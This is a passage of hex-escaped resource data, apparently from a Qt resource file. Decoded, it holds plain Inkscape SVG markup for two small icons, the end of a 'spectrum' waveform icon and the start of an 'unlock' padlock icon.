\x65\x64\x20\x77\x69\x74\x68\x20\x49\x6e\x6b\x73\x63\x61\x70\x65\
\x20\x28\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x2e\x6f\x72\x67\x2f\x29\x20\x2d\x2d\x3e\x0a\
\x0a\x3c\x73\x76\x67\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x64\
\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x70\x75\x72\x6c\x2e\x6f\
\x72\x67\x2f\x64\x63\x2f\x65\x6c\x65\x6d\x65\x6e\x74\x73\x2f\x31\
\x2e\x31\x2f\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x63\x63\
\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x63\x72\x65\x61\x74\x69\x76\
\x65\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x6f\x72\x67\x2f\x6e\x73\x23\
\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x72\x64\x66\x3d\x22\
\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\
\x67\x2f\x31\x39\x39\x39\x2f\x30\x32\x2f\x32\x32\x2d\x72\x64\x66\
\x2d\x73\x79\x6e\x74\x61\x78\x2d\x6e\x73\x23\x22\x0a\x20\x20\x20\
\x78\x6d\x6c\x6e\x73\x3a\x73\x76\x67\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3d\
\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\
\x72\x67\x2f\x32\x30\x30\x30\x2f\x73\x76\x67\x22\x0a\x20\x20\x20\
\x78\x6d\x6c\x6e\x73\x3a\x73\x6f\x64\x69\x70\x6f\x64\x69\x3d\x22\
\x68\x74\x74\x70\x3a\x2f\x2f\x73\x6f\x64\x69\x70\x6f\x64\x69\x2e\
\x73\x6f\x75\x72\x63\x65\x66\x6f\x72\x67\x65\x2e\x6e\x65\x74\x2f\
\x44\x54\x44\x2f\x73\x6f\x64\x69\x70\x6f\x64\x69\x2d\x30\x2e\x64\
\x74\x64\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\
\x77\x2e\x69\x6e\x6b\x73\x63\x61\x70\x65\x2e\x6f\x72\x67\x2f\x6e\
\x61\x6d\x65\x73\x70\x61\x63\x65\x73\x2f\x69\x6e\x6b\x73\x63\x61\
\x70\x65\x22\x0a\x20\x20\x20\x77\x69\x64\x74\x68\x3d\x22\x31\x36\
\x70\x78\x22\x0a\x20\x20\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x31\
\x36\x70\x78\x22\x0a\x20\x20\x20\x76\x69\x65\x77\x42\x6f\x78\x3d\
\x22\x30\x20\x30\x20\x31\x36\x20\x31\x36\x22\x0a\x20\x20\x20\x76\
\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x31\x22\x0a\x20\x20\x20\
\x69\x64\x3d\x22\x53\x56\x47\x52\x6f\x6f\x74\x22\x0a\x20\x20\x20\
\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x76\x65\x72\x73\x69\x6f\x6e\
\x3d\x22\x30\x2e\x39\x32\x2e\x31\x20\x72\x22\x0a\x20\x20\x20\x73\
\x6f\x64\x69\x70\x6f\x64\x69\x3a\x64\x6f\x63\x6e\x61\x6d\x65\x3d\
\x22\x73\x70\x65\x63\x74\x72\x75\x6d\x2e\x73\x76\x67\x22\x3e\x0a\
\x20\x20\x3c\x73\x6f\x64\x69\x70\x6f\x64\x69\x3a\x6e\x61\x6d\x65\
\x64\x76\x69\x65\x77\x0a\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x62\
\x61\x73\x65\x22\x0a\x20\x20\x20\x20\x20\x70\x61\x67\x65\x63\x6f\
\x6c\x6f\x72\x3d\x22\x23\x66\x66\x66\x66\x66\x66\x22\x0a\x20\x20\
\x20\x20\x20\x62\x6f\x72\x64\x65\x72\x63\x6f\x6c\x6f\x72\x3d\x22\
\x23\x36\x36\x36\x36\x36\x36\x22\x0a\x20\x20\x20\x20\x20\x62\x6f\
\x72\x64\x65\x72\x6f\x70\x61\x63\x69\x74\x79\x3d\x22\x31\x2e\x30\
\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\
\x70\x61\x67\x65\x6f\x70\x61\x63\x69\x74\x79\x3d\x22\x30\x2e\x30\
\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\
\x70\x61\x67\x65\x73\x68\x61\x64\x6f\x77\x3d\x22\x32\x22\x0a\x20\
\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x7a\x6f\x6f\
\x6d\x3d\x22\x34\x35\x2e\x32\x35\x34\x38\x33\x34\x22\x0a\x20\x20\
\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x63\x78\x3d\x22\
\x34\x2e\x30\x30\x30\x37\x32\x32\x32\x22\x0a\x20\x20\x20\x20\x20\
\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x63\x79\x3d\x22\x37\x2e\x39\
\x35\x35\x30\x31\x30\x35\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x3a\x64\x6f\x63\x75\x6d\x65\x6e\x74\x2d\x75\
\x6e\x69\x74\x73\x3d\x22\x70\x78\x22\x0a\x20\x20\x20\x20\x20\x69\
\x6e\x6b\x73\x63\x61\x70\x65\x3a\x63\x75\x72\x72\x65\x6e\x74\x2d\
\x6c\x61\x79\x65\x72\x3d\x22\x6c\x61\x79\x65\x72\x31\x22\x0a\x20\
\x20\x20\x20\x20\x73\x68\x6f\x77\x67\x72\x69\x64\x3d\x22\x66\x61\
\x6c\x73\x65\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\
\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x77\x69\x64\x74\x68\x3d\
\x22\x31\x39\x32\x30\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\
\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x68\x65\x69\x67\
\x68\x74\x3d\x22\x31\x30\x31\x35\x22\x0a\x20\x20\x20\x20\x20\x69\
\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x78\
\x3d\x22\x30\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\
\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x79\x3d\x22\x30\x22\x0a\
\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\
\x6e\x64\x6f\x77\x2d\x6d\x61\x78\x69\x6d\x69\x7a\x65\x64\x3d\x22\
\x31\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\
\x3a\x67\x72\x69\x64\x2d\x62\x62\x6f\x78\x3d\x22\x74\x72\x75\x65\
\x22\x20\x2f\x3e\x0a\x20\x20\x3c\x64\x65\x66\x73\x0a\x20\x20\x20\
\x20\x20\x69\x64\x3d\x22\x64\x65\x66\x73\x35\x37\x38\x38\x22\x20\
\x2f\x3e\x0a\x20\x20\x3c\x6d\x65\x74\x61\x64\x61\x74\x61\x0a\x20\
\x20\x20\x20\x20\x69\x64\x3d\x22\x6d\x65\x74\x61\x64\x61\x74\x61\
\x35\x37\x39\x31\x22\x3e\x0a\x20\x20\x20\x20\x3c\x72\x64\x66\x3a\
\x52\x44\x46\x3e\x0a\x20\x20\x20\x20\x20\x20\x3c\x63\x63\x3a\x57\
\x6f\x72\x6b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\x66\
\x3a\x61\x62\x6f\x75\x74\x3d\x22\x22\x3e\x0a\x20\x20\x20\x20\x20\
\x20\x20\x20\x3c\x64\x63\x3a\x66\x6f\x72\x6d\x61\x74\x3e\x69\x6d\
\x61\x67\x65\x2f\x73\x76\x67\x2b\x78\x6d\x6c\x3c\x2f\x64\x63\x3a\
\x66\x6f\x72\x6d\x61\x74\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\x20\
\x3c\x64\x63\x3a\x74\x79\x70\x65\x0a\x20\x20\x20\x20\x20\x20\x20\
\x20\x20\x20\x20\x72\x64\x66\x3a\x72\x65\x73\x6f\x75\x72\x63\x65\
\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x70\x75\x72\x6c\x2e\x6f\x72\
\x67\x2f\x64\x63\x2f\x64\x63\x6d\x69\x74\x79\x70\x65\x2f\x53\x74\
\x69\x6c\x6c\x49\x6d\x61\x67\x65\x22\x20\x2f\x3e\x0a\x20\x20\x20\
\x20\x20\x20\x20\x20\x3c\x64\x63\x3a\x74\x69\x74\x6c\x65\x20\x2f\
\x3e\x0a\x20\x20\x20\x20\x20\x20\x3c\x2f\x63\x63\x3a\x57\x6f\x72\
\x6b\x3e\x0a\x20\x20\x20\x20\x3c\x2f\x72\x64\x66\x3a\x52\x44\x46\
\x3e\x0a\x20\x20\x3c\x2f\x6d\x65\x74\x61\x64\x61\x74\x61\x3e\x0a\
\x20\x20\x3c\x67\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\
\x70\x65\x3a\x6c\x61\x62\x65\x6c\x3d\x22\x45\x62\x65\x6e\x65\x20\
\x32\x22\x0a\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x6c\x61\x79\x65\
\x72\x32\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\
\x65\x3a\x67\x72\x6f\x75\x70\x6d\x6f\x64\x65\x3d\x22\x6c\x61\x79\
\x65\x72\x22\x20\x2f\x3e\x0a\x20\x20\x3c\x67\x0a\x20\x20\x20\x20\
\x20\x69\x64\x3d\x22\x6c\x61\x79\x65\x72\x31\x22\x0a\x20\x20\x20\
\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x67\x72\x6f\x75\x70\
\x6d\x6f\x64\x65\x3d\x22\x6c\x61\x79\x65\x72\x22\x0a\x20\x20\x20\
\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x6c\x61\x62\x65\x6c\
\x3d\x22\x45\x62\x65\x6e\x65\x20\x31\x22\x3e\x0a\x20\x20\x20\x20\
\x3c\x70\x61\x74\x68\x0a\x20\x20\x20\x20\x20\x20\x20\x73\x74\x79\
\x6c\x65\x3d\x22\x66\x69\x6c\x6c\x3a\x23\x38\x30\x62\x33\x66\x66\
\x3b\x66\x69\x6c\x6c\x2d\x72\x75\x6c\x65\x3a\x65\x76\x65\x6e\x6f\
\x64\x64\x3b\x73\x74\x72\x6f\x6b\x65\x3a\x23\x37\x64\x37\x64\x37\
\x64\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\x64\x74\x68\x3a\x31\
\x70\x78\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\x6e\x65\x63\x61\
\x70\x3a\x62\x75\x74\x74\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x6c\x69\
\x6e\x65\x6a\x6f\x69\x6e\x3a\x6d\x69\x74\x65\x72\x3b\x73\x74\x72\
\x6f\x6b\x65\x2d\x6f\x70\x61\x63\x69\x74\x79\x3a\x31\x22\x0a\x20\
\x20\x20\x20\x20\x20\x20\x64\x3d\x22\x4d\x20\x2d\x30\x2e\x31\x37\
\x36\x37\x37\x36\x37\x2c\x31\x33\x2e\x31\x39\x33\x36\x37\x20\x43\
\x20\x2d\x30\x2e\x31\x35\x34\x36\x37\x39\x36\x31\x2c\x31\x33\x2e\
\x30\x36\x31\x30\x38\x38\x20\x30\x2e\x37\x39\x35\x34\x39\x35\x31\
\x32\x2c\x37\x2e\x32\x37\x31\x36\x35\x30\x37\x20\x30\x2e\x37\x39\
\x35\x34\x39\x35\x31\x32\x2c\x37\x2e\x32\x37\x31\x36\x35\x30\x37\
\x20\x4c\x20\x31\x2e\x36\x31\x33\x30\x38\x37\x33\x2c\x31\x32\x2e\
\x38\x31\x38\x30\x31\x39\x20\x32\x2e\x39\x36\x31\x30\x30\x39\x36\
\x2c\x38\x2e\x34\x36\x34\x38\x39\x33\x34\x20\x34\x2e\x30\x32\x31\
\x36\x36\x39\x38\x2c\x31\x33\x2e\x33\x32\x36\x32\x35\x32\x20\x35\
\x2e\x35\x30\x32\x31\x37\x34\x36\x2c\x37\x2e\x37\x31\x33\x35\x39\
\x32\x34\x20\x36\x2e\x32\x37\x35\x35\x37\x32\x37\x2c\x31\x32\x2e\
\x31\x39\x39\x33\x30\x31\x20\x38\x2e\x32\x32\x30\x31\x31\x36\x33\
\x2c\x30\x2e\x35\x30\x39\x39\x34\x32\x30\x36\x20\x31\x30\x2e\x33\
\x34\x31\x34\x33\x37\x2c\x31\x33\x2e\x31\x37\x31\x35\x37\x33\x20\
\x6c\x20\x31\x2e\x36\x33\x35\x31\x38\x34\x2c\x2d\x35\x2e\x31\x37\
\x30\x37\x31\x38\x35\x20\x30\x2e\x38\x36\x31\x37\x38\x37\x2c\x34\
\x2e\x31\x35\x34\x32\x35\x32\x35\x20\x30\x2e\x37\x37\x33\x33\x39\
\x37\x2c\x2d\x33\x2e\x39\x39\x39\x35\x37\x32\x39\x20\x30\x2e\x36\
\x36\x32\x39\x31\x33\x2c\x34\x2e\x38\x31\x37\x31\x36\x34\x39\x20\
\x31\x2e\x30\x33\x38\x35\x36\x33\x2c\x2d\x35\x2e\x35\x39\x30\x35\
\x36\x32\x39\x20\x30\x2e\x37\x39\x35\x34\x39\x35\x2c\x35\x2e\x38\
\x31\x31\x35\x33\x33\x39\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x69\
\x64\x3d\x22\x70\x61\x74\x68\x34\x36\x33\x31\x22\x0a\x20\x20\x20\
\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x63\x6f\x6e\
\x6e\x65\x63\x74\x6f\x72\x2d\x63\x75\x72\x76\x61\x74\x75\x72\x65\
\x3d\x22\x30\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x73\x6f\x64\x69\
\x70\x6f\x64\x69\x3a\x6e\x6f\x64\x65\x74\x79\x70\x65\x73\x3d\x22\
\x63\x63\x63\x63\x63\x63\x63\x63\x63\x63\x63\x63\x63\x63\x63\x22\
\x20\x2f\x3e\x0a\x20\x20\x3c\x2f\x67\x3e\x0a\x3c\x2f\x73\x76\x67\
\x3e\x0a\
\x00\x00\x0d\x0c\
\x3c\
\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\
\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54\x46\
\x2d\x38\x22\x20\x73\x74\x61\x6e\x64\x61\x6c\x6f\x6e\x65\x3d\x22\
\x6e\x6f\x22\x3f\x3e\x0a\x3c\x21\x2d\x2d\x20\x43\x72\x65\x61\x74\
\x65\x64\x20\x77\x69\x74\x68\x20\x49\x6e\x6b\x73\x63\x61\x70\x65\
\x20\x28\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x2e\x6f\x72\x67\x2f\x29\x20\x2d\x2d\x3e\x0a\
\x0a\x3c\x73\x76\x67\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x64\
\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x70\x75\x72\x6c\x2e\x6f\
\x72\x67\x2f\x64\x63\x2f\x65\x6c\x65\x6d\x65\x6e\x74\x73\x2f\x31\
\x2e\x31\x2f\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x63\x63\
\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x63\x72\x65\x61\x74\x69\x76\
\x65\x63\x6f\x6d\x6d\x6f\x6e\x73\x2e\x6f\x72\x67\x2f\x6e\x73\x23\
\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x72\x64\x66\x3d\x22\
\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\
\x67\x2f\x31\x39\x39\x39\x2f\x30\x32\x2f\x32\x32\x2d\x72\x64\x66\
\x2d\x73\x79\x6e\x74\x61\x78\x2d\x6e\x73\x23\x22\x0a\x20\x20\x20\
\x78\x6d\x6c\x6e\x73\x3a\x73\x76\x67\x3d\x22\x68\x74\x74\x70\x3a\
\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\x72\x67\x2f\x32\x30\x30\
\x30\x2f\x73\x76\x67\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3d\
\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x77\x33\x2e\x6f\
\x72\x67\x2f\x32\x30\x30\x30\x2f\x73\x76\x67\x22\x0a\x20\x20\x20\
\x78\x6d\x6c\x6e\x73\x3a\x73\x6f\x64\x69\x70\x6f\x64\x69\x3d\x22\
\x68\x74\x74\x70\x3a\x2f\x2f\x73\x6f\x64\x69\x70\x6f\x64\x69\x2e\
\x73\x6f\x75\x72\x63\x65\x66\x6f\x72\x67\x65\x2e\x6e\x65\x74\x2f\
\x44\x54\x44\x2f\x73\x6f\x64\x69\x70\x6f\x64\x69\x2d\x30\x2e\x64\
\x74\x64\x22\x0a\x20\x20\x20\x78\x6d\x6c\x6e\x73\x3a\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\
\x77\x2e\x69\x6e\x6b\x73\x63\x61\x70\x65\x2e\x6f\x72\x67\x2f\x6e\
\x61\x6d\x65\x73\x70\x61\x63\x65\x73\x2f\x69\x6e\x6b\x73\x63\x61\
\x70\x65\x22\x0a\x20\x20\x20\x77\x69\x64\x74\x68\x3d\x22\x31\x36\
\x70\x78\x22\x0a\x20\x20\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x31\
\x36\x70\x78\x22\x0a\x20\x20\x20\x76\x69\x65\x77\x42\x6f\x78\x3d\
\x22\x30\x20\x30\x20\x31\x36\x20\x31\x36\x22\x0a\x20\x20\x20\x76\
\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x31\x22\x0a\x20\x20\x20\
\x69\x64\x3d\x22\x53\x56\x47\x52\x6f\x6f\x74\x22\x0a\x20\x20\x20\
\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x76\x65\x72\x73\x69\x6f\x6e\
\x3d\x22\x30\x2e\x39\x32\x2e\x31\x20\x72\x22\x0a\x20\x20\x20\x73\
\x6f\x64\x69\x70\x6f\x64\x69\x3a\x64\x6f\x63\x6e\x61\x6d\x65\x3d\
\x22\x75\x6e\x6c\x6f\x63\x6b\x2e\x73\x76\x67\x22\x3e\x0a\x20\x20\
\x3c\x73\x6f\x64\x69\x70\x6f\x64\x69\x3a\x6e\x61\x6d\x65\x64\x76\
\x69\x65\x77\x0a\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x62\x61\x73\
\x65\x22\x0a\x20\x20\x20\x20\x20\x70\x61\x67\x65\x63\x6f\x6c\x6f\
\x72\x3d\x22\x23\x66\x66\x66\x66\x66\x66\x22\x0a\x20\x20\x20\x20\
\x20\x62\x6f\x72\x64\x65\x72\x63\x6f\x6c\x6f\x72\x3d\x22\x23\x36\
\x36\x36\x36\x36\x36\x22\x0a\x20\x20\x20\x20\x20\x62\x6f\x72\x64\
\x65\x72\x6f\x70\x61\x63\x69\x74\x79\x3d\x22\x31\x2e\x30\x22\x0a\
\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x70\x61\
\x67\x65\x6f\x70\x61\x63\x69\x74\x79\x3d\x22\x30\x2e\x30\x22\x0a\
\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x70\x61\
\x67\x65\x73\x68\x61\x64\x6f\x77\x3d\x22\x32\x22\x0a\x20\x20\x20\
\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x7a\x6f\x6f\x6d\x3d\
\x22\x33\x32\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\
\x70\x65\x3a\x63\x78\x3d\x22\x32\x2e\x34\x33\x38\x35\x38\x34\x22\
\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x63\
\x79\x3d\x22\x38\x2e\x34\x36\x32\x32\x30\x35\x39\x22\x0a\x20\x20\
\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x64\x6f\x63\x75\
\x6d\x65\x6e\x74\x2d\x75\x6e\x69\x74\x73\x3d\x22\x70\x78\x22\x0a\
\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x63\x75\
\x72\x72\x65\x6e\x74\x2d\x6c\x61\x79\x65\x72\x3d\x22\x6c\x61\x79\
\x65\x72\x31\x22\x0a\x20\x20\x20\x20\x20\x73\x68\x6f\x77\x67\x72\
\x69\x64\x3d\x22\x66\x61\x6c\x73\x65\x22\x0a\x20\x20\x20\x20\x20\
\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\
\x77\x69\x64\x74\x68\x3d\x22\x31\x34\x34\x30\x22\x0a\x20\x20\x20\
\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\
\x77\x2d\x68\x65\x69\x67\x68\x74\x3d\x22\x38\x34\x34\x22\x0a\x20\
\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\
\x64\x6f\x77\x2d\x78\x3d\x22\x30\x22\x0a\x20\x20\x20\x20\x20\x69\
\x6e\x6b\x73\x63\x61\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x79\
\x3d\x22\x30\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\
\x70\x65\x3a\x77\x69\x6e\x64\x6f\x77\x2d\x6d\x61\x78\x69\x6d\x69\
\x7a\x65\x64\x3d\x22\x31\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\
\x73\x63\x61\x70\x65\x3a\x67\x72\x69\x64\x2d\x62\x62\x6f\x78\x3d\
\x22\x74\x72\x75\x65\x22\x20\x2f\x3e\x0a\x20\x20\x3c\x64\x65\x66\
\x73\x0a\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x64\x65\x66\x73\x31\
\x30\x22\x20\x2f\x3e\x0a\x20\x20\x3c\x6d\x65\x74\x61\x64\x61\x74\
\x61\x0a\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x6d\x65\x74\x61\x64\
\x61\x74\x61\x31\x33\x22\x3e\x0a\x20\x20\x20\x20\x3c\x72\x64\x66\
\x3a\x52\x44\x46\x3e\x0a\x20\x20\x20\x20\x20\x20\x3c\x63\x63\x3a\
\x57\x6f\x72\x6b\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x72\x64\
\x66\x3a\x61\x62\x6f\x75\x74\x3d\x22\x22\x3e\x0a\x20\x20\x20\x20\
\x20\x20\x20\x20\x3c\x64\x63\x3a\x66\x6f\x72\x6d\x61\x74\x3e\x69\
\x6d\x61\x67\x65\x2f\x73\x76\x67\x2b\x78\x6d\x6c\x3c\x2f\x64\x63\
\x3a\x66\x6f\x72\x6d\x61\x74\x3e\x0a\x20\x20\x20\x20\x20\x20\x20\
\x20\x3c\x64\x63\x3a\x74\x79\x70\x65\x0a\x20\x20\x20\x20\x20\x20\
\x20\x20\x20\x20\x20\x72\x64\x66\x3a\x72\x65\x73\x6f\x75\x72\x63\
\x65\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x70\x75\x72\x6c\x2e\x6f\
\x72\x67\x2f\x64\x63\x2f\x64\x63\x6d\x69\x74\x79\x70\x65\x2f\x53\
\x74\x69\x6c\x6c\x49\x6d\x61\x67\x65\x22\x20\x2f\x3e\x0a\x20\x20\
\x20\x20\x20\x20\x20\x20\x3c\x64\x63\x3a\x74\x69\x74\x6c\x65\x3e\
\x3c\x2f\x64\x63\x3a\x74\x69\x74\x6c\x65\x3e\x0a\x20\x20\x20\x20\
\x20\x20\x3c\x2f\x63\x63\x3a\x57\x6f\x72\x6b\x3e\x0a\x20\x20\x20\
\x20\x3c\x2f\x72\x64\x66\x3a\x52\x44\x46\x3e\x0a\x20\x20\x3c\x2f\
\x6d\x65\x74\x61\x64\x61\x74\x61\x3e\x0a\x20\x20\x3c\x67\x0a\x20\
\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x67\x72\x6f\
\x75\x70\x6d\x6f\x64\x65\x3d\x22\x6c\x61\x79\x65\x72\x22\x0a\x20\
\x20\x20\x20\x20\x69\x64\x3d\x22\x6c\x61\x79\x65\x72\x33\x22\x0a\
\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\x63\x61\x70\x65\x3a\x6c\x61\
\x62\x65\x6c\x3d\x22\x45\x62\x65\x6e\x65\x20\x33\x22\x20\x2f\x3e\
\x0a\x20\x20\x3c\x67\x0a\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x6c\
\x61\x79\x65\x72\x31\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\
\x63\x61\x70\x65\x3a\x67\x72\x6f\x75\x70\x6d\x6f\x64\x65\x3d\x22\
\x6c\x61\x79\x65\x72\x22\x0a\x20\x20\x20\x20\x20\x69\x6e\x6b\x73\
\x63\x61\x70\x65\x3a\x6c\x61\x62\x65\x6c\x3d\x22\x45\x62\x65\x6e\
\x65\x20\x31\x22\x3e\x0a\x20\x20\x20\x20\x3c\x72\x65\x63\x74\x0a\
\x20\x20\x20\x20\x20\x20\x20\x73\x74\x79\x6c\x65\x3d\x22\x66\x69\
\x6c\x6c\x3a\x23\x30\x30\x35\x35\x64\x34\x3b\x66\x69\x6c\x6c\x2d\
\x6f\x70\x61\x63\x69\x74\x79\x3a\x31\x3b\x73\x74\x72\x6f\x6b\x65\
\x2d\x77\x69\x64\x74\x68\x3a\x31\x2e\x32\x39\x35\x35\x32\x35\x30\
\x37\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x69\x64\x3d\x22\x72\x65\
\x63\x74\x32\x36\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x77\x69\x64\
\x74\x68\x3d\x22\x31\x33\x2e\x31\x38\x37\x35\x22\x0a\x20\x20\x20\
\x20\x20\x20\x20\x68\x65\x69\x67\x68\x74\x3d\x22\x39\x2e\x34\x31\
\x30\x39\x36\x32\x31\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x78\x3d\
\x22\x31\x2e\x35\x33\x31\x32\x35\x22\x0a\x20\x20\x20\x20\x20\x20\
\x20\x79\x3d\x22\x36\x2e\x31\x38\x32\x37\x38\x37\x39\x22\x0a\x20\
\x20\x20\x20\x20\x20\x20\x72\x79\x3d\x22\x31\x2e\x36\x36\x38\x39\
\x33\x39\x22\x20\x2f\x3e\x0a\x20\x20\x20\x20\x3c\x70\x61\x74\x68\
\x0a\x20\x20\x20\x20\x20\x20\x20\x73\x74\x79\x6c\x65\x3d\x22\x66\
\x69\x6c\x6c\x3a\x6e\x6f\x6e\x65\x3b\x66\x69\x6c\x6c\x2d\x6f\x70\
\x61\x63\x69\x74\x79\x3a\x31\x3b\x73\x74\x72\x6f\x6b\x65\x3a\x23\
\x30\x30\x35\x35\x64\x34\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x77\x69\
\x64\x74\x68\x3a\x32\x2e\x33\x37\x38\x39\x39\x39\x39\x35\x3b\x73\
\x74\x72\x6f\x6b\x65\x2d\x6d\x69\x74\x65\x72\x6c\x69\x6d\x69\x74\
\x3a\x34\x3b\x73\x74\x72\x6f\x6b\x65\x2d\x64\x61\x73\x68\x61\x72\
\x72\x61\x79\x3a\x6e\x6f\x6e\x65\x3b\x73\x74\x72\x6f\x6b\x65\x2d\
\x6f\x70\x61\x63\x69\x74\x79\x3a\x31\x22\x0a\x20\x20\x20\x20\x20\
\x20\x20\x69\x64\x3d\x22\x70\x61\x74\x68\x39\x35\x35\x22\x0a\x20\
\x20\x20\x20\x20\x20\x20\x73\x6f\x64\x69\x70\x6f\x64\x69\x3a\x74\
\x79\x70\x65\x3d\x22\x61\x72\x63\x22\x0a\x20\x20\x20\x20\x20\x20\
\x20\x73\x6f\x64\x69\x70\x6f\x64\x69\x3a\x63\x78\x3d\x22\x38\x2e\
\x30\x39\x34\x36\x31\x30\x32\x22\x0a\x20\x20\x20\x20\x20\x20\x20\
\x73\x6f\x64\x69\x70\x6f\x64\x69\x3a\x63\x79\x3d\x22\x34\x2e\x39\
\x32\x34\x30\x31\x34\x31\x22\x0a\x20\x20\x20\x20\x20\x20\x20\x73\
\x6f\x64\x69\x70\x6f\x64\x69\x3a\x72\x78\x3d\x22\x34\x2e\x30\x37\
